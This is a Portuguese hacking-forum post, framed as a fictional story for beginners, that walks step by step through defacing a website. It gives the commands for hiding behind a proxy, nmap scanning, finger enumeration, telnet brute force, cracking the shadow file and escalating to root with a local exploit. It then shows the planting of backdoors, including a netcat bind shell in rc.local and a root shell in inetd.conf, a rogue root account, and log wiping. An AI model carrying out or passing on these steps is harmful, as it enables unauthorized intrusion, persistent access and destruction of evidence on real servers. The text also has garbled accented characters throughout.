c









Olí pessoal, estou escrevendo esse tópico porque muita gente que nunca invadiu realmente não faz a mànima
idéia de como é fazer tal coisa ou se jí invadiu não sabe o que fazer após "avançar entre as entranhas do
alvo". Esse pode ser um tópico bem idiota eu admito, mas com ele espero dar uma luz para os iniciantes.
Esse tópico vai mostrar o exemplo de um defacement. Como achar um alvo vulnerível, como não ser pego
em uma invasão, etc. Tudo isso em uma pequena historinha fictàcia, mas com ferramentas e
vulnerablilidades reais. Vamos começar.

(1-) O inàcio:

Aqui o hacker que eu vou chamar de Jonathan criou um mirror(pígina criada para fazer o defacement de um
site substituindo-a pela original) em html. Ela tem um fundo preto, com uma grande mensagem escrito
"Exploited by Cyb3r_D14bl0" que se trata do apelido hacker de Jonathan, além de uma foto criada por ele
muito legal no photoshop, sua marca registrada, além de um link que permite enviar um email para ele
próprio. John estí frustrado e aborrecido porque não encontra nenhum alvo vulnerível. Mas hoje Jonathan
jurou que não sairia da frente do computador até que conseguisse hackear um site. Jonathan então toma as
primeiras providências para o ataque.

(2-) Escondendo-se na rede:

O fato do mirror de Jonathan ser simples, não significa que ele é um imbecil. Ele sabe que deve ocultar seu
endereço ip ou serí pego na primeira tentativa de ataque. Jonathan começa acessando a pígina
http://www.stayinvisible.com. Essa pígina mostra o endereço ip de seus visitantes. O ip de Jonathan é
201.143.222.88. Então ele usa o programa Anonymity4Proxy, e procura o endereço ip de um bom servidor
proxy na grande lista do programa. Ele encontra um servidor proxy no México marcado como high
anonymity(alto anonimato). Isso é bom para Jonathan. O endereço ip desse proxy é 67.154.22.224. Jonathan
liga o computador do lado que estí rodando Linux slackware 10.2 (ele antes estava em outro com Windows
XP sp2). Jonathan configura os browsers e serviços adicionais de ambos os sistemas para que se conectem
ao proxy. Jonathan acessa a novamente a pígina http://www.stayinvisible.com e sorri ao ver que em ambos
os sistemas o seu ip não apareceu mais na pígina, e sim o ip do proxy que Jonathan escolheu. Agora ele estí
anônimo e pronto para atacar.

(3-) FootPriting & FingerPriting. Invadindo...:

Nessa fase do ataque, Jonathan vai procurar por alvos vulneríveis e explorí-los com o objetivo de invídi-los.
Jonathan começa visitando alguns sites e de repente, sem querer Jonathan acessa um site chamado http://the-
fact-pleasure.net. Se trata de um site de pedofilia! Se tem uma coisa que Jonathan odeia são os pedófilos.
Jonathan escolheu seu alvo(atenção esse site é fictàcio). Jonathan começa abrindo um terminal em seu
sistema linux e digitando o seguinte comando no terminal:

# ping -c4 the-fact-pleasure.net

Isso envia 4 pacotes do tipo icmp echo request para o site. Com isso Jonathan pega o ip do site que é
208.194.22.126 e também Jonathan percebe que o site normalmente respondeu a todos os pacotes. Isso
significa que o firewall do site não deve estar filtrando trífego icmp. Jonathan analisa o esquema de
endereçamento ip e deduz as seguintes informações a respeito da rede do alvo:

(a-)Se trata de uma rede de classe C(o ip começa com 3 dàgitos maior que 191).
(b-)A míscara da rede é de 255.255.255.0 (somente os últimos 3 digàtos dos endereços ips sofrem
alterações).
(c-)Pode-se ter até 255 computadores na rede( 208.194.22.1 até 208.194.22.255).

Agora Jonathan deseja descobrir quais desses host estão online na rede, então ele vai usar um ping scan
utlizando-se do nmap para tal, usando a seguinte linha de comando:

# nmap -sP -vv 208.194.22.1-255 > /home/log_hosts.txt

Após alguns minutos, Jonathan checa o log e ve que os seguintes hosts estão "alive":

208.194.22.12
208.194.22.17
208.194.22.56
208.194.22.88
208.194.22.100
208.194.22.115
208.194.22.126
208.194.22.201
208.194.22.211
208.194.22.253

Caso o servidor do site esteja muito protegido, Jonathan poderí tentar hackear esses computadores para usa-
los como "trampolin" para o servidor do site. Agora ele vai fazer o teste de fingerpriting para pegar
informações preciosas sobre o servidor do site. O comando é o segunite:

# nmap -O -vv -sV 208.194.22.126

Esse teste retomou as seguintes informações:

as portas tcp 21,22,25 e 80 estão abertas. (Serviços ftp, ssh, smtp e http).
O sistema operacional é linux red hat 2.4.18 ou 2.4.19(sem certeza).
Na porta 21 estí um servidor pureFTPD, na 22 um servidor open ssh 1.1, na 25 um servidor qmail e por
último um apache mod_ssl v 1.3.37]

Jonathan ja adquiriu bastante informações sobre o alvo até aqui. Mas ele deseja saber mais ja que até aqui
ele não encontrou uma vulnerabilidade perigosa que o permita invadir o sistema. Ele tenta então traçar a rota
para descobrir mais informações a respeito do firewall do alvo, ele então digita o seguinte comando no seu
terminal:

# traceroute 208.194.22.126

Normalmente em um traçamento de rotas, o penúltimo salto é o firewall do alvo e o penúltimo salto era o
endereço ip 194.126.22.1. Agora ele tem o ip do possàvel firewall do alvo. Para ter certeza ele faz o seguinte
teste com o nmap:

# nmap -vv -O 194.126.22.1

Isso gerou o seguinte resultado:

(a-)as portas 1000 estí abertas...

(b-) Device type: firewall/router

Agora Jonathan tem certeza de que se trata de um firewall e um firewall que ele conhece muito bem. O Web
min que é configurado via browser, Jonathan digita a seguinte url no seu navegador konqueror do linux:
http://194.126.22.1:1000

Uma tela de login de administração de firewall acaba de se abrir no seu navegador!

Em seguida, Jonathan scaneia a rede do firewall, apenas tentando localizar as portas 79 e/ou 23 em algum
computador aberto, para isso ele usa novamente o nmap com o seguinte comando:

# nmap -sT -p23,79 -vv 194.126.22.2-255 > /home/log2.txt

Ao analisar o log, Jonathan ve que o host e194.126.22.131 estí com as portas 23 e 79 abertas. Jonathan da o
comando finger nesse host e enumera os seguintes usuírios:

root
mark
lizie
guest

Jonathan se utiliza do programa Brutus para fazer brute force no telnet e obtém sucesso. A senha do root é
$!#donothackit$!#

Jonathan invade o host e baixa os arquivos passwd e shadow, em seguida faz cracking deles com o programa
john the ripper. Ele deduz que os usuírios podem ser os mesmos para todos os hosts dessa rede, jí que foram
muito poucos os computadores marcados como "alive".

Jonathan deduz correto. A conta login mark/password h4xor1234 é a conta do administrador do firewall.
Antes de simplesmente derrubar o firewall do alvo, Jonathan faz outro teste com o nmap no site para
descobrir quais portas estão abertas, mas que estão sendo filtradas pelo firewall. Jonatham executa o seguinte
comando no seu terminal:

#nmap -sA -vv -p1-200 208.194.22.126

As seguintes portas estão marcadas como "unfiltered": 21,22,23,53,69,79,80,110

Bingo! Mais um telnet! Agora sim Jonathan invade o firewall derrubando-o e em seguida da um finger no
sistema. Jonathan consegue apenas enumerar o usuírio lilith. Ele usa novamente o brutus para fazer brute
force no telnet e descobre a senha do usuírio lilith. Ele conseguiu uma shell remota em seu alvo com poderes
normais.

a saàda foi:

[server04@lilith]$

Jonathan digita id e ve o que ele possui um uid = 1000 e um gid = 1000. Ele precisa obter acesso root para
fazer o defacement. Ele lembra da versão do apache e tem uma idéia. Primeiro ele executa esse comando na
shell:

$find /bin -perm +4000

Ele sorri ao ver que a sua conta hackeada tem permissão para usar o ftp. Ele conecta em um ftp de um site
hacker, baixa um exploit local que explora um bug no apache. Em seguida Jonathan o compila:

$gcc -o gotRoot exploit_exemplo.c

E o executa....

Jonathan fica empolgado e a adrenalina no seu corpo aumenta. ele ve outra shell em sua tela

[server04@root]#

Ele digita esses comandos só para confirmar

# id
# whoami

Ele estí logado como root! Sem perder tempo ele executa o seguinte comando:

# whereis apache

a saida foi:

/home/root/apache

Basta executar:

# cd /home/root/apache
# cd htdocs

Jonathan executa um ls e pronto! Ele localiza o index1.html! Agora é hora de desfigurar a pígina:

Ele remove a pígina usando o comando:

# rm index1.html

Em seguida ele vai transferir seu mirro via linha de comando. Seu computador estí com o serviço ativo de
ftp, então Jonathan usa o servidor do site no seu computador dando o seguinte comando:

# ftp 201.143.222.88 user Cyber pass Diablo

Após conectar, basta dar o seguinte comando:

> get index1.html

Agora Jonathan desconecta do seu ftp e move o mirror para o local da pígina original com o seguinte
comando:

mv /ftp-files/index1.html /home/root/apache/htdocs

Pronto, a pígina foi desfigurada! Agora Jonathan precisa dar um jeito de criar suas backdoors e apagar seus
rastros no sistema.
(4-) Backdoors:

Primeiramente, Jonathan foi para o diretório principal do sistema com o comando:

# cd /etc

Lí, ele editou o arquivo rc.local com o editor vi inserindo a seguinte linha de comando nele:

nc -l -p 6012 -e /bin/sh

Isso lhe da uma shell imediata com poderes de root sem qualquer forma de autenticação na porta tcp 6012 no
próximo boot do sistema.

Jonathan cria uma conta pirata no sistema com poderes de root com o comando adduser e depois altera os
privilégios de uma conta qualquer para root, assim despistando os administradores.

Por último, Jonathan percebe que o sistema é antigo, pois possui o arquivo inetd.conf em /etc. Ele edita esse
arquivo também com o vi inserond o nele o seguinte conteúdo:

cool stream tcp nowait root /bin/sh -i

E depois também edita arquivo services com o seguinte conteúdo:

cool 775/tcp cnn

Mais uma shell para Jonathan....

Agora com suas backdoors, Jonathan vai apagar os logs do sistema para não ser pego usando esses
comandos:

# echo " " > /var/log/ossec/*.log

# echo " " > /home/root/apache/logs/*.log
# echo " " > ~ .bash_history
# echo " " > /var/log/ossec/*.log

Com isso todos os logs do sistema ficam com conteúdo em branco(nulo). Por último, Jonathan da um reboot
no sistema para suas backdoors serem ativadas, ele desconecta do seu alvo e proxy. Jonathan sorri ao acessar
http://the-fact-pleasure.net e visualizar seu mirror. E o melhor de tud é que ele dificilmente vai ser pego por
isso...

Bom gente é isso ai, espero que vocês gostem. Isso é ridiculo para os hackers experientes desse fórum, mas
espero ter ajudado os iniciantes a entenderem como um ataque hacker é realizado. Foi um exemplo simples,
mas espero que tenha valido a pena. Abraço pra todos, fui.
p